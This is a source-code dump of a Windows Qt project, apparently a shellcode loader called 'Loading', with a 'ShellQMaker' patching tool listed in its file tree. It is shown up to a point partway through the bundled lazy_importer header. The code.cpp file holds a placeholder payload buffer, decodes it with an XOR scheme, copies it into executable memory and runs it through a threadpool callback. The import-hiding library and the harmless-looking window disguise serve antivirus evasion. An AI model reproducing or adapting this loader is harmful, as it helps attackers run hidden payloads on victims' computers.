├── Loading ├── Loading.sln ├── Loading │ ├── Loading.cpp │ ├── Loading.h │ ├── code.cpp │ ├── code.h │ ├── lazy_importer.hpp │ ├── main.cpp │ ├── moc │ │ └── moc_Loading.cpp │ ├── rcc │ │ └── qrc_Loading.cpp │ └── uic │ │ └── ui_Loading.h └── res │ └── Loading.ico ├── Loading_1.2 ├── Loading.sln ├── Loading │ ├── Loading.cpp │ ├── Loading.h │ ├── code.cpp │ ├── code.h │ ├── lazy_importer.hpp │ ├── main.cpp │ ├── moc │ │ └── moc_Loading.cpp │ ├── rcc │ │ └── qrc_Loading.cpp │ └── uic │ │ └── ui_Loading.h └── res │ └── Loading.ico ├── Readme ├── Result-01.png ├── Result-02.png ├── Result-03.png ├── Result-04.png ├── ShellQMaker-Files-001.png ├── shellQMaker-Instructions-001.png ├── shellQMaker-Instructions-002.png ├── shellQMaker-Instructions-003.png └── shellQMaker-Instructions-004.png ├── ShellQMaker ├── ShellQMaker.sln └── ShellQMaker │ ├── ShellQMaker.cpp │ ├── ShellQMaker.h │ ├── main.cpp │ └── main.h ├── readme.md └── readme_en.md /Loading/Loading.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33110.190 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loading", "Loading.vcxproj", "{C430F35E-F396-494F-B5AA-43D8BA1A42F1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Debug|x86.ActiveCfg = Debug|Win32 15 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Debug|x86.Build.0 = Debug|Win32 16 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Release|x86.ActiveCfg = Release|Win32 17 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Release|x86.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3FAB5FFE-9354-496A-9899-64C62FF2DB98} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Loading/Loading/Loading.cpp: -------------------------------------------------------------------------------- 1 | #include "Loading.h" 2 | #include "code.h" 3 | 4 | Loading::Loading(QWidget *parent) 5 | : QMainWindow(parent) 6 | { 7 | ui.setupUi(this); 8 | start(); 9 | } 10 | 11 | Loading::~Loading() 12 | {} 13 | -------------------------------------------------------------------------------- /Loading/Loading/Loading.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "ui_Loading.h" 5 | 6 | class Loading : public QMainWindow 7 | { 8 | Q_OBJECT 9 | 10 | public: 11 | Loading(QWidget *parent = nullptr); 12 | ~Loading(); 13 | 14 | private: 15 | Ui::LoadingClass ui; 16 | }; 17 | -------------------------------------------------------------------------------- /Loading/Loading/code.cpp: -------------------------------------------------------------------------------- 1 | #include "code.h" 2 | #include "lazy_importer.hpp" 3 | #include "winuser.h" 4 | 5 | void* MMcpy(void* dst, const void* src, size_t len) 6 | { 7 | char* ch_dst = (char*)dst; 8 | char* ch_src = (char*)src; 9 | if (NULL == ch_dst || NULL == ch_src) { 10 | return NULL; 11 | } 12 | 13 | void* rest = ch_dst; 14 | 15 | if (ch_dst <= ch_src || (char*)ch_dst >= (char*)ch_src + len) { 16 | while (len--) { 17 | *(char*)ch_dst = *(char*)ch_src; 18 | ch_dst = (char*)ch_dst + 1; 19 | ch_src = (char*)ch_src + 1; 20 | } 21 | } 22 | else { 23 | ch_src = (char*)ch_src + len - 1; 24 | ch_dst = (char*)ch_dst + len - 1; 25 | while (len--) { 26 | *(char*)ch_dst = *(char*)ch_src; 27 | ch_dst = (char*)ch_dst - 1; 28 | ch_src = (char*)ch_src - 1; 29 | } 30 | } 31 | return rest; 32 | } 33 | void start() 34 | { 35 | //char shellcode[DATA_SIZE] = { 0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41 }; 36 | char shellcode[DATA_SIZE] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; 37 | DWORD size = ((PDWORD)shellcode)[0];//size 38 | HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL); 39 | char* shellcodeAddress =(char*)(VirtualAlloc)(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 40 | char* tmpptr = shellcode + sizeof(DWORD); 41 | for (int i = 0; i < size; i++) 42 | { 43 | tmpptr[i] = (tmpptr[i] - 1) ^ (i + 1); 44 | //tmpptr[i] = tmpptr[i]; 45 | } 46 | MMcpy(shellcodeAddress, tmpptr, sizeof(shellcode)); 47 | PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL); 48 | SetThreadpoolWait(threadPoolWait, event, NULL); 49 | WaitForSingleObject(event, INFINITE); 50 | while (1) 51 | { 52 | Sleep(12000); 53 | } 54 | //return 0; 55 | } -------------------------------------------------------------------------------- /Loading/Loading/code.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #define DATA_SIZE 27136 4 | 5 | 6 | void start(); 7 | 8 | void run(void* buffer); 9 | -------------------------------------------------------------------------------- /Loading/Loading/lazy_importer.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018-2022 Justas Masiulis 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | // === FAQ === documentation is available at https://github.com/JustasMasiulis/lazy_importer 18 | // * Code doesn't compile with errors about pointer conversion: 19 | // - Try using `nullptr` instead of `NULL` or call `get()` instead of using the overloaded operator() 20 | // * Lazy importer can't find the function I want: 21 | // - Double check that the module in which it's located in is actually loaded 22 | // - Try #define LAZY_IMPORTER_CASE_INSENSITIVE 23 | // This will start using case insensitive comparison globally 24 | // - Try #define LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS 25 | // This will enable forwarded export resolution globally instead of needing explicit `forwarded()` calls 26 | 27 | #ifndef LAZY_IMPORTER_HPP 28 | #define LAZY_IMPORTER_HPP 29 | 30 | 31 | #define LI_FN(name) ::li::detail::lazy_function() 32 | 33 | #define LI_FN_DEF(name) ::li::detail::lazy_function() 34 | 35 | #define LI_MODULE(name) ::li::detail::lazy_module() 36 | 37 | #ifndef LAZY_IMPORTER_CPP_FORWARD 38 | #ifdef LAZY_IMPORTER_NO_CPP_FORWARD 39 | #define LAZY_IMPORTER_CPP_FORWARD(t, v) v 40 | #else 41 | #include 42 | #define LAZY_IMPORTER_CPP_FORWARD(t, v) std::forward( v ) 43 | #endif 44 | #endif 45 | 46 | #include 47 | 48 | #ifndef LAZY_IMPORTER_NO_FORCEINLINE 49 | #if defined(_MSC_VER) 50 | #define LAZY_IMPORTER_FORCEINLINE __forceinline 51 | #elif defined(__GNUC__) && __GNUC__ > 3 52 | #define LAZY_IMPORTER_FORCEINLINE inline __attribute__((__always_inline__)) 53 | #else 54 | #define LAZY_IMPORTER_FORCEINLINE inline 55 | #endif 56 | #else 57 | #define LAZY_IMPORTER_FORCEINLINE inline 58 | #endif 59 | 60 | 61 | #ifdef LAZY_IMPORTER_CASE_INSENSITIVE 62 | #define LAZY_IMPORTER_CASE_SENSITIVITY false 63 | #else 64 | #define LAZY_IMPORTER_CASE_SENSITIVITY true 65 | #endif 66 | 67 | #define LAZY_IMPORTER_STRINGIZE(x) #x 68 | #define LAZY_IMPORTER_STRINGIZE_EXPAND(x) LAZY_IMPORTER_STRINGIZE(x) 69 | 70 | #define LAZY_IMPORTER_KHASH(str) ::li::detail::khash(str, \ 71 | ::li::detail::khash_impl( __TIME__ __DATE__ LAZY_IMPORTER_STRINGIZE_EXPAND(__LINE__) LAZY_IMPORTER_STRINGIZE_EXPAND(__COUNTER__), 2166136261 )) 72 | 73 | namespace li { namespace detail { 74 | 75 | namespace win { 76 | 77 | struct LIST_ENTRY_T { 78 | const char* Flink; 79 | const char* Blink; 80 | }; 81 | 82 | struct UNICODE_STRING_T { 83 | unsigned short Length; 84 | unsigned short MaximumLength; 85 | wchar_t* Buffer; 86 | }; 87 | 88 | struct PEB_LDR_DATA_T { 89 | unsigned long Length; 90 | unsigned long Initialized; 91 | const char* SsHandle; 92 | LIST_ENTRY_T InLoadOrderModuleList; 93 | }; 94 | 95 | struct PEB_T { 96 | unsigned char Reserved1[2]; 97 | unsigned char BeingDebugged; 98 | unsigned char Reserved2[1]; 99 | const char* Reserved3[2]; 100 | PEB_LDR_DATA_T* Ldr; 101 | }; 102 | 103 | struct LDR_DATA_TABLE_ENTRY_T { 104 | LIST_ENTRY_T InLoadOrderLinks; 105 | LIST_ENTRY_T InMemoryOrderLinks; 106 | LIST_ENTRY_T InInitializationOrderLinks; 107 | const char* DllBase; 108 | const char* EntryPoint; 109 | union { 110 | unsigned long SizeOfImage; 111 | const char* _dummy; 112 | }; 113 | UNICODE_STRING_T FullDllName; 114 | UNICODE_STRING_T BaseDllName; 115 | 116 | LAZY_IMPORTER_FORCEINLINE const LDR_DATA_TABLE_ENTRY_T* 117 | load_order_next() const noexcept 118 | { 119 | return reinterpret_cast( 120 | InLoadOrderLinks.Flink); 121 | } 122 | }; 123 | 124 | struct IMAGE_DOS_HEADER { // DOS .EXE header 125 | unsigned short e_magic; // Magic number 126 | unsigned short e_cblp; // Bytes on last page of file 127 | unsigned short e_cp; // Pages in file 128 | unsigned short e_crlc; // Relocations 129 | unsigned short e_cparhdr; // Size of header in paragraphs 130 | unsigned short e_minalloc; // Minimum extra paragraphs needed 131 | unsigned short e_maxalloc; // Maximum extra paragraphs needed 132 | unsigned short e_ss; // Initial (relative) SS value 133 | unsigned short e_sp; // Initial SP value 134 | unsigned short e_csum; // Checksum 135 | unsigned short e_ip; // Initial IP value 136 | unsigned short e_cs; // Initial (relative) CS value 137 | unsigned short e_lfarlc; // File address of relocation table 138 | unsigned short e_ovno; // Overlay number 139 | unsigned short e_res[4]; // Reserved words 140 | unsigned short e_oemid; // OEM identifier (for e_oeminfo) 141 | unsigned short e_oeminfo; // OEM information; e_oemid specific 142 | unsigned short e_res2[10]; // Reserved words 143 | long e_lfanew; // File address of new exe header 144 | }; 145 | 146 | struct IMAGE_FILE_HEADER { 147 | unsigned short Machine; 148 | unsigned short NumberOfSections; 149 | unsigned long TimeDateStamp; 150 | unsigned long PointerToSymbolTable; 151 | unsigned long NumberOfSymbols; 152 | unsigned short SizeOfOptionalHeader; 153 | unsigned short Characteristics; 154 | }; 155 | 156 | struct IMAGE_EXPORT_DIRECTORY { 157 | unsigned long Characteristics; 158 | unsigned long TimeDateStamp; 159 | unsigned short MajorVersion; 160 | unsigned short MinorVersion; 161 | unsigned long Name; 162 | unsigned long Base; 163 | unsigned long NumberOfFunctions; 164 | unsigned long NumberOfNames; 165 | unsigned long AddressOfFunctions; // RVA from base of image 166 | unsigned long AddressOfNames; // RVA from base of image 167 | unsigned long AddressOfNameOrdinals; // RVA from base of image 168 | }; 169 | 170 | struct IMAGE_DATA_DIRECTORY { 171 | unsigned long VirtualAddress; 172 | unsigned long Size; 173 | }; 174 | 175 | struct IMAGE_OPTIONAL_HEADER64 { 176 | unsigned short Magic; 177 | unsigned char MajorLinkerVersion; 178 | unsigned char MinorLinkerVersion; 179 | unsigned long SizeOfCode; 180 | unsigned long SizeOfInitializedData; 181 | unsigned long SizeOfUninitializedData; 182 | unsigned long AddressOfEntryPoint; 183 | unsigned long BaseOfCode; 184 | unsigned long long ImageBase; 185 | unsigned long SectionAlignment; 186 | unsigned long FileAlignment; 187 | unsigned short MajorOperatingSystemVersion; 188 | unsigned short MinorOperatingSystemVersion; 189 | unsigned short MajorImageVersion; 190 | unsigned short MinorImageVersion; 191 | unsigned short MajorSubsystemVersion; 192 | unsigned short MinorSubsystemVersion; 193 | unsigned long Win32VersionValue; 194 | unsigned long SizeOfImage; 195 | unsigned long SizeOfHeaders; 196 | unsigned long CheckSum; 197 | unsigned short Subsystem; 198 | unsigned short DllCharacteristics; 199 | unsigned long long SizeOfStackReserve; 200 | unsigned long long SizeOfStackCommit; 201 | unsigned long long SizeOfHeapReserve; 202 | unsigned long long SizeOfHeapCommit; 203 | unsigned long LoaderFlags; 204 | unsigned long NumberOfRvaAndSizes; 205 | IMAGE_DATA_DIRECTORY DataDirectory[16]; 206 | }; 207 | 208 | struct IMAGE_OPTIONAL_HEADER32 { 209 | unsigned short Magic; 210 | unsigned char MajorLinkerVersion; 211 | unsigned char MinorLinkerVersion; 212 | unsigned long SizeOfCode; 213 | unsigned long SizeOfInitializedData; 214 | unsigned long SizeOfUninitializedData; 215 | unsigned long AddressOfEntryPoint; 216 | unsigned long BaseOfCode; 217 | unsigned long BaseOfData; 218 | unsigned long ImageBase; 219 | unsigned long SectionAlignment; 220 | unsigned long FileAlignment; 221 | unsigned short MajorOperatingSystemVersion; 222 | unsigned short MinorOperatingSystemVersion; 223 | unsigned short MajorImageVersion; 224 | unsigned short MinorImageVersion; 225 | unsigned short MajorSubsystemVersion; 226 | unsigned short MinorSubsystemVersion; 227 | unsigned long Win32VersionValue; 228 | unsigned long SizeOfImage; 229 | unsigned long SizeOfHeaders; 230 | unsigned long CheckSum; 231 | unsigned short Subsystem; 232 | unsigned short DllCharacteristics; 233 | unsigned long SizeOfStackReserve; 234 | unsigned long SizeOfStackCommit; 235 | unsigned long SizeOfHeapReserve; 236 | unsigned long SizeOfHeapCommit; 237 | unsigned long LoaderFlags; 238 | unsigned long NumberOfRvaAndSizes; 239 | IMAGE_DATA_DIRECTORY DataDirectory[16]; 240 | }; 241 | 242 | struct IMAGE_NT_HEADERS { 243 | unsigned long Signature; 244 | IMAGE_FILE_HEADER FileHeader; 245 | #ifdef _WIN64 246 | IMAGE_OPTIONAL_HEADER64 OptionalHeader; 247 | #else 248 | IMAGE_OPTIONAL_HEADER32 OptionalHeader; 249 | #endif 250 | }; 251 | 252 | } // namespace win 253 | 254 | struct forwarded_hashes { 255 | unsigned module_hash; 256 | unsigned function_hash; 257 | }; 258 | 259 | // 64 bit integer where 32 bits are used for the hash offset 260 | // and remaining 32 bits are used for the hash computed using it 261 | using offset_hash_pair = unsigned long long; 262 | 263 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned get_hash(offset_hash_pair pair) noexcept { return ( pair & 0xFFFFFFFF ); } 264 | 265 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned get_offset(offset_hash_pair pair) noexcept { return ( pair >> 32 ); } 266 | 267 | template 268 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned hash_single(unsigned value, char c) noexcept 269 | { 270 | return static_cast( 271 | (value ^ ((!CaseSensitive && c >= 'A' && c <= 'Z') ? (c | (1 << 5)) : c)) * 272 | static_cast(16777619)); 273 | } 274 | 275 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned 276 | khash_impl(const char* str, unsigned value) noexcept 277 | { 278 | return (*str ? khash_impl(str + 1, hash_single(value, *str)) : value); 279 | } 280 | 281 | LAZY_IMPORTER_FORCEINLINE constexpr offset_hash_pair khash( 282 | const char* str, unsigned offset) noexcept 283 | { 284 | return ((offset_hash_pair{ offset } << 32) | khash_impl(str, offset)); 285 | } 286 | 287 | template 288 | LAZY_IMPORTER_FORCEINLINE unsigned hash(const CharT* str, unsigned offset) noexcept 289 | { 290 | unsigned value = offset; 291 | 292 | for(;;) { 293 | char c = *str++; 294 | if(!c) 295 | return value; 296 | value = hash_single(value, c); 297 | } 298 | } 299 | 300 | LAZY_IMPORTER_FORCEINLINE unsigned hash( 301 | const win::UNICODE_STRING_T& str, unsigned offset) noexcept 302 | { 303 | auto first = str.Buffer; 304 | const auto last = first + (str.Length / sizeof(wchar_t)); 305 | auto value = offset; 306 | for(; first != last; ++first) 307 | value = hash_single(value, static_cast(*first)); 308 | 309 | return value; 310 | } 311 | 312 | LAZY_IMPORTER_FORCEINLINE forwarded_hashes hash_forwarded( 313 | const char* str, unsigned offset) noexcept 314 | { 315 | forwarded_hashes res{ offset, offset }; 316 | 317 | for(; *str != '.'; ++str) 318 | res.module_hash = hash_single(res.module_hash, *str); 319 | 320 | ++str; 321 | 322 | for(; *str; ++str) 323 | res.function_hash = hash_single(res.function_hash, *str); 324 | 325 | return res; 326 | } 327 | 328 | // some helper functions 329 | LAZY_IMPORTER_FORCEINLINE const win::PEB_T* peb() noexcept 330 | { 331 | #if defined(_M_X64) || defined(__amd64__) 332 | return reinterpret_cast(__readgsqword(0x60)); 333 | #elif defined(_M_IX86) || defined(__i386__) 334 | return reinterpret_cast(__readfsdword(0x30)); 335 | #elif defined(_M_ARM) || defined(__arm__) 336 | return *reinterpret_cast(_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30); 337 | #elif defined(_M_ARM64) || defined(__aarch64__) 338 | return *reinterpret_cast(__getReg(18) + 0x60); 339 | #elif defined(_M_IA64) || defined(__ia64__) 340 | return *reinterpret_cast(static_cast(_rdteb()) + 0x60); 341 | #else 342 | #error Unsupported platform. Open an issue and I'll probably add support. 343 | #endif 344 | } 345 | 346 | LAZY_IMPORTER_FORCEINLINE const win::PEB_LDR_DATA_T* ldr() 347 | { 348 | return reinterpret_cast(peb()->Ldr); 349 | } 350 | 351 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_NT_HEADERS* nt_headers( 352 | const char* base) noexcept 353 | { 354 | return reinterpret_cast( 355 | base + reinterpret_cast(base)->e_lfanew); 356 | } 357 | 358 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* image_export_dir( 359 | const char* base) noexcept 360 | { 361 | return reinterpret_cast( 362 | base + nt_headers(base)->OptionalHeader.DataDirectory->VirtualAddress); 363 | } 364 | 365 | LAZY_IMPORTER_FORCEINLINE const win::LDR_DATA_TABLE_ENTRY_T* ldr_data_entry() noexcept 366 | { 367 | return reinterpret_cast( 368 | ldr()->InLoadOrderModuleList.Flink); 369 | } 370 | 371 | struct exports_directory { 372 | const char* _base; 373 | const win::IMAGE_EXPORT_DIRECTORY* _ied; 374 | unsigned long _ied_size; 375 | 376 | public: 377 | using size_type = unsigned long; 378 | 379 | LAZY_IMPORTER_FORCEINLINE 380 | exports_directory(const char* base) noexcept : _base(base) 381 | { 382 | const auto ied_data_dir = nt_headers(base)->OptionalHeader.DataDirectory[0]; 383 | _ied = reinterpret_cast( 384 | base + ied_data_dir.VirtualAddress); 385 | _ied_size = ied_data_dir.Size; 386 | } 387 | 388 | LAZY_IMPORTER_FORCEINLINE explicit operator bool() const noexcept 389 | { 390 | return reinterpret_cast(_ied) != _base; 391 | } 392 | 393 | LAZY_IMPORTER_FORCEINLINE size_type size() const noexcept 394 | { 395 | return _ied->NumberOfNames; 396 | } 397 | 398 | LAZY_IMPORTER_FORCEINLINE const char* base() const noexcept { return _base; } 399 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* ied() const noexcept 400 | { 401 | return _ied; 402 | 